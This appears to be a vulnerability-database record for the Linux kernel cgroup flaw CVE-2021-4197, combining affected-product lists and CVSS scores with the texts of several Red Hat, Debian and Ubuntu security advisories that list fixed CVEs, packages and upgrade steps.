iQIVAwUBYvKietzjgjWX9erEAQjQ7g/+Ok8sWBeaehUxS8YKMtNEdLzO8Eg5TKfA 3MoORr+P+WZIQFy7pN/GeKojlsy1ApnNEnc7j0qC2dibUBfguOWEoAMdds07DwF3 Jw3iANT5sJZv3s4yT9FvYu9Wnwl/iYJ9w8iH19oePFFKg0QtxAWUvSlIvp2eSZ1L yw86wqAzASDqc86Y0fkIvmxopq80lyI//rNqPXsATKq1oGFRstQmfUz+2UxonlMC tVUfRJjlPDZDU57EpBcxWH/TVPV/JdvcQPQEOJ+u+ZVg2H4qEwptqpgjZ4upYbMJ AAIymXUwmX9QHOcXSOiZ+1DZMJawj5ezkqGwQIl919w3bX/m6peQPbBBoYbXLSrS gtRwgshIIZTs6AzOOVm6+XOSKGRR/C9i1YjNUBF6oY4s+wVtYJvtRwdNrKtH7pCT b0FMcLGG0yo/pGuMfB6zmgEn/tEL0IGqoSeN5avb+NObEDYWMGru4sBjdaA66wu4 1JfPAP/yQ7rW0NXleJXjv9Xhdae7b8en9YxlsWLcp/QE8bppT6tjyIW/aVXEZZva /B1ACyosleJYYYYoqqbU97mCaG/LfH/fz7euD9GgJXOCjGNoHAkKe/DOXg7YTSZP aDbtU3ZeESqyRpAJ8nkM4lZLFTxYNmDp+8tWMx6UXQnNRBOMW4bEQRtzTQB+vrWH fzoc8e3L82I=ARFk -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Relevant releases/architectures:
Red Hat Enterprise Linux Real Time EUS (v.8.4) - x86_64 Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
-
kernel: Small table perturb size in the TCP source port generation algorithm can lead to information leak (CVE-2022-1012)
-
kernel: race condition in perf_event_open leads to privilege escalation (CVE-2022-1729)
-
kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root (CVE-2022-32250)
-
kernel: cgroup: Use open-time creds and namespace for migration perm checks (CVE-2021-4197)
-
kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses (CVE-2021-4203)
-
kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
kernel-rt: update RT source tree to the RHEL-8.4.z10 source tree (BZ#2087922)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):
1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check 2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks 2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses 2064604 - CVE-2022-1012 kernel: Small table perturb size in the TCP source port generation algorithm can lead to information leak 2086753 - CVE-2022-1729 kernel: race condition in perf_event_open leads to privilege escalation 2092427 - CVE-2022-32250 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root
- Package List:
Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4):
Source: kernel-rt-4.18.0-305.57.1.rt7.129.el8_4.src.rpm
x86_64: kernel-rt-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-kvm-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-kvm-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm
Red Hat Enterprise Linux Real Time EUS (v.8.4):
Source: kernel-rt-4.18.0-305.57.1.rt7.129.el8_4.src.rpm
x86_64: kernel-rt-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Summary:
The Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes 2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console 2040693 - ?Replication repository? wizard has no validation for name length 2040695 - [MTC UI] ?Add Cluster? wizard stucks when the cluster name length is more than 63 characters 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com? 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings 2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace 2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. 2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade 2061335 - [MTC UI] ?Update cluster? button is not getting disabled 2062266 - MTC UI does not display logs properly [OADP-BL] 2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend 2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x 2076593 - Velero pod log missing from UI drop down 2076599 - Velero pod log missing from downloaded logs folder [OADP-BL] 2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan 2079252 - [MTC] Rsync options logs not visible in log-reader pod 2082221 - Don't allow Storage class conversion migration if source cluster has only one storage class defined [UI] 2082225 - non-numeric user when launching stage pods [OADP-BL] 2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments 2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods 2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels 2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL] 2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts 2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL] 2096939 - Fix legacy operator.yml inconsistencies and errors 2100486 - [MTC UI] Target storage class field is not getting respected when clusters don't have replication repo configured
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.15"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.11"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.4.189"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.19.238"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.15.14"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.14.276"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.5"
},
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.10.111"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.20"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.2"
},
{
"_id": null,
"model": "h300s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "oracle communications cloud native core binding support function",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"_id": null,
"model": "brocade fabric os",
"scope": null,
"trust": 0.8,
"vendor": "broadcom",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "168019"
},
{
"db": "PACKETSTORM",
"id": "167822"
},
{
"db": "PACKETSTORM",
"id": "167679"
}
],
"trust": 0.4
},
"cve": "CVE-2021-4197",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2021-4197",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-410862",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2021-4197",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-4197",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-4197",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-4197",
"trust": 0.8,
"value": "High"
},
{
"author": "VULHUB",
"id": "VHN-410862",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"description": {
"_id": null,
"data": "An unprivileged write to the file handler flaw in the Linux kernel\u0027s control groups and namespaces subsystem was found in the way users have access to some less privileged process that are controlled by cgroups and have higher privileged parent process. It is actually both for cgroup2 and cgroup1 versions of control groups. A local user could use this flaw to crash the system or escalate their privileges on the system. Linux Kernel There is an authentication vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The Linux kernel is the kernel used by the American Linux Foundation\u0027s open source operating system Linux. Attackers can use this vulnerability to bypass the restrictions of the Linux kernel through Cgroup Fd Writing to elevate their privileges. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5127-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 02, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2021-4197 CVE-2022-0168 CVE-2022-1016 CVE-2022-1048\n CVE-2022-1158 CVE-2022-1195 CVE-2022-1198 CVE-2022-1199\n CVE-2022-1204 CVE-2022-1205 CVE-2022-1353 CVE-2022-1516\n CVE-2022-26490 CVE-2022-27666 CVE-2022-28356 CVE-2022-28388\n CVE-2022-28389 CVE-2022-28390 CVE-2022-29582\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks. The security impact is negligible as\n CAP_SYS_ADMIN inherently gives the ability to deny service. \n\nCVE-2022-1016\n\n David Bouman discovered a flaw in the netfilter subsystem where the\n nft_do_chain function did not initialize register data that\n nf_tables expressions can read from and write to. \n\nCVE-2022-1158\n\n Qiuhao Li, Gaoning Pan, and Yongkang Jia discovered a bug in the\n KVM implementation for x86 processors. A local user with access to\n /dev/kvm could cause the MMU emulator to update page table entry\n flags at the wrong address. \n\nCVE-2022-1199, CVE-2022-1204, CVE-2022-1205\n\n Duoming Zhou discovered race conditions in the AX.25 hamradio\n protocol, which could lead to a use-after-free or null pointer\n dereference. \n\nCVE-2022-1353\n\n The TCS Robot tool found an information leak in the PF_KEY\n subsystem. \n\nCVE-2022-1516\n\n A NULL pointer dereference flaw in the implementation of the X.25\n set of standardized network protocols, which can result in denial\n of service. \n\n This driver is not enabled in Debian\u0027s official kernel\n configurations. \n\nCVE-2022-26490\n\n Buffer overflows in the STMicroelectronics ST21NFCA core driver can\n result in denial of service or privilege escalation. \n\n This driver is not enabled in Debian\u0027s official kernel\n configurations. \n\nCVE-2022-27666\n\n \"valis\" reported a possible buffer overflow in the IPsec ESP\n transformation code. \n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 5.10.113-1. \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmJwRg9fFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0S8bw//bsMGzd7yC5QHR9/G3Vxn10HSYSy9vkPdOrg9nt58xCygMTvj9G4Ur7P5\nSqPulxdczzDQgAEl/UVzmCifFMAbfi77w+0feha6zbrjz4yD8vtmk1caVmvbqOxE\nMsS7GKyFdRxvqWoCG1boIZZ5aKFCgXug4cY1nARJo4tadF3W3lZw9LP9+kdDJ0Z8\n4zfzd1fa0tn6Bk9lqVvaks3zVxLA2Iev0yaLGpWPbsrqiSEnB/e1tWAQX7CVRUNT\nkY48YpAsGraOyjTMkmLyeXNYHwdNYfKR27DK/4CpXeVzqADlMqKtFOp0lvQhF54t\nKcBvJjvQsJ5ua7qjoJS97SLlMp7aZ3DvBnz28hn3vDp5iqFDTdLSmuPqJGy5JAOD\nJdijjSFCB2tTjDLBha+1mGAB2kJG8Kj0rcEiQTyFARejOoCIQg9R3EWfp5HI8DCn\ne4fGZdRATm6Qe9ofBlVmKmVpV36NaiZuy3UA8lhKTlJsjIhwnFB/WknG93/G64HK\nwMSkbbXDPoYgH06emh0RIXzddfHHO+mZBgUysHBX5pE0KdDazPleFGn5yOdlX8k5\n5OT35Cga+hRVT9KNQfz4Me0AEt0kEwyMIUM6R49KvB8eQ9Az1OjO0yWONz4F5mDW\n0HoSJCW+9gZzljIebL+odSyT/dvUZpP/xVzE8DRukDyn99GY6y4=\n=vCuc\n-----END PGP SIGNATURE-----\n. ==========================================================================\nUbuntu Security Notice USN-5513-1\nJuly 13, 2022\n\nlinux-aws vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n\nDetails:\n\nNorbert Slusarek discovered a race condition in the CAN BCM networking\nprotocol of the Linux kernel leading to multiple use-after-free\nvulnerabilities. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-3609)\n\nLikang Luo discovered that a race condition existed in the Bluetooth\nsubsystem of the Linux kernel, leading to a use-after-free vulnerability. A\nlocal attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2021-3752)\n\nIt was discovered that the NFC subsystem in the Linux kernel contained a\nuse-after-free vulnerability in its NFC Controller Interface (NCI)\nimplementation. A local attacker could possibly use this to cause a denial\nof service (system crash) or execute arbitrary code. (CVE-2021-3760)\n\nSzymon Heidrich discovered that the USB Gadget subsystem in the Linux\nkernel did not properly restrict the size of control requests for certain\ngadget types, leading to possible out of bounds reads or writes. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-39685)\n\nIt was discovered that the Ion Memory Manager subsystem in the Linux kernel\ncontained a use-after-free vulnerability. A local attacker could possibly\nuse this to cause a denial of service (system crash) or execute arbitrary\ncode. (CVE-2021-39714)\n\nEric Biederman discovered that the cgroup process migration implementation\nin the Linux kernel did not perform permission checks correctly in some\nsituations. (CVE-2021-4197)\n\nLin Ma discovered that the NFC Controller Interface (NCI) implementation in\nthe Linux kernel contained a race condition, leading to a use-after-free\nvulnerability. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2021-4202)\n\nSushma Venkatesh Reddy discovered that the Intel i915 graphics driver in\nthe Linux kernel did not perform a GPU TLB flush in some situations. A\nlocal attacker could use this to cause a denial of service or possibly\nexecute arbitrary code. (CVE-2022-0330)\n\nIt was discovered that the PF_KEYv2 implementation in the Linux kernel did\nnot properly initialize kernel memory in some situations. A local attacker\ncould use this to expose sensitive information (kernel memory). \n(CVE-2022-1353)\n\nIt was discovered that the virtual graphics memory manager implementation\nin the Linux kernel was subject to a race condition, potentially leading to\nan information leak. (CVE-2022-1419)\n\nMinh Yuan discovered that the floppy disk driver in the Linux kernel\ncontained a race condition, leading to a use-after-free vulnerability. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or execute arbitrary code. (CVE-2022-1652)\n\nIt was discovered that the Atheros ath9k wireless device driver in the\nLinux kernel did not properly handle some error conditions, leading to a\nuse-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2022-1679)\n\nIt was discovered that the Marvell NFC device driver implementation in the\nLinux kernel did not properly perform memory cleanup operations in some\nsituations, leading to a use-after-free vulnerability. A local attacker\ncould possibly use this to cause a denial of service (system) or execute\narbitrary code. (CVE-2022-1734)\n\nIt was discovered that some Intel processors did not completely perform\ncleanup actions on multi-core shared buffers. A local attacker could\npossibly use this to expose sensitive information. (CVE-2022-21123)\n\nIt was discovered that some Intel processors did not completely perform\ncleanup actions on microarchitectural fill buffers. A local attacker could\npossibly use this to expose sensitive information. (CVE-2022-21125)\n\nIt was discovered that some Intel processors did not properly perform\ncleanup during specific special register write operations. A local attacker\ncould possibly use this to expose sensitive information. (CVE-2022-21166)\n\nIt was discovered that the USB Gadget file system interface in the Linux\nkernel contained a use-after-free vulnerability. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2022-24958)\n\n\u8d75\u5b50\u8f69 discovered that the 802.2 LLC type 2 driver in the Linux kernel did not\nproperly perform reference counting in some error conditions. (CVE-2022-28356)\n\nIt was discovered that the 8 Devices USB2CAN interface implementation in\nthe Linux kernel did not properly handle certain error conditions, leading\nto a double-free. (CVE-2022-28388)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n linux-image-4.4.0-1109-aws 4.4.0-1109.115\n linux-image-aws 4.4.0.1109.106\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://ubuntu.com/security/notices/USN-5513-1\n CVE-2021-3609, CVE-2021-3752, CVE-2021-3760, CVE-2021-39685,\n CVE-2021-39714, CVE-2021-4197, CVE-2021-4202, CVE-2022-0330,\n CVE-2022-1353, CVE-2022-1419, CVE-2022-1652, CVE-2022-1679,\n CVE-2022-1734, CVE-2022-21123, CVE-2022-21125, CVE-2022-21166,\n CVE-2022-24958, CVE-2022-28356, CVE-2022-28388\n. Summary:\n\nRed Hat OpenShift Container Platform release 4.9.45 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.9.45. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2022:5878\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nSecurity Fix(es):\n\n* openshift: oauth-serving-cert configmap contains cluster certificate\nprivate key (CVE-2022-2403)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.9.45-x86_64\n\nThe image digest is\nsha256:8ab373599e8a010dffb9c7ed45e01c00cb06a7857fe21de102d978be4738b2ec\n\n(For s390x architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.9.45-s390x\n\nThe image digest is\nsha256:1dde8a7134081c82012a812e014daca4cba1095630e6d0c74b51da141d472984\n\n(For ppc64le architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.9.45-ppc64le\n\nThe image digest is\nsha256:ec1fac628bec05eb6425c2ae9dcd3fca120cd1a8678155350bb4c65813cfc30e\n\nAll OpenShift Container Platform 4.9 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2009024 - Unable to complete cluster destruction, some ports are left over\n2055494 - console operator should report Upgradeable False when SAN-less certs are used\n2083554 - post 1.23 rebase: regression in service-load balancer reliability\n2087021 - configure-ovs.sh fails, blocking new RHEL node from being scaled up on cluster without manual reboot\n2088539 - Openshift route URLs starting with double slashes stopped working after update to 4.8.33 - curl version problems\n2091806 - Cluster upgrade stuck due to \"resource deletions in progress\"\n2095320 - [4.9] Bootimage bump tracker\n2097157 - [4.9z] During ovnkube-node restart all host conntrack entries are flushed, leading to traffic disruption\n2100786 - [OCP 4.9] Ironic cannot match \"wwn\" rootDeviceHint for a multipath device\n2101664 - disabling ipv6 router advertisements using \"all\" does not disable it on secondary interfaces\n2101959 - CVE-2022-2403 openshift: oauth-serving-cert configmap contains cluster certificate private key\n2103982 - [4.9] AWS EBS CSI driver stuck removing EBS volumes - GetDeviceMountRefs check failed\n2105277 - NetworkPolicies: ovnkube-master pods crashing due to panic: \"invalid memory address or nil pointer dereference\"\n2105453 - Node reboot causes duplicate persistent volumes\n2105654 - egressIP panics with nil pointer dereference\n2105663 - APIRequestCount does not identify some APIs removed in 4.9\n2106655 - Kubelet slowly leaking memory and pods eventually unable to start\n2108538 - [4.9.z backport] br-ex not created due to default bond interface having a different mac address than expected\n2108619 - ClusterVersion history pruner does not always retain initial completed update entry\n\n5. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG 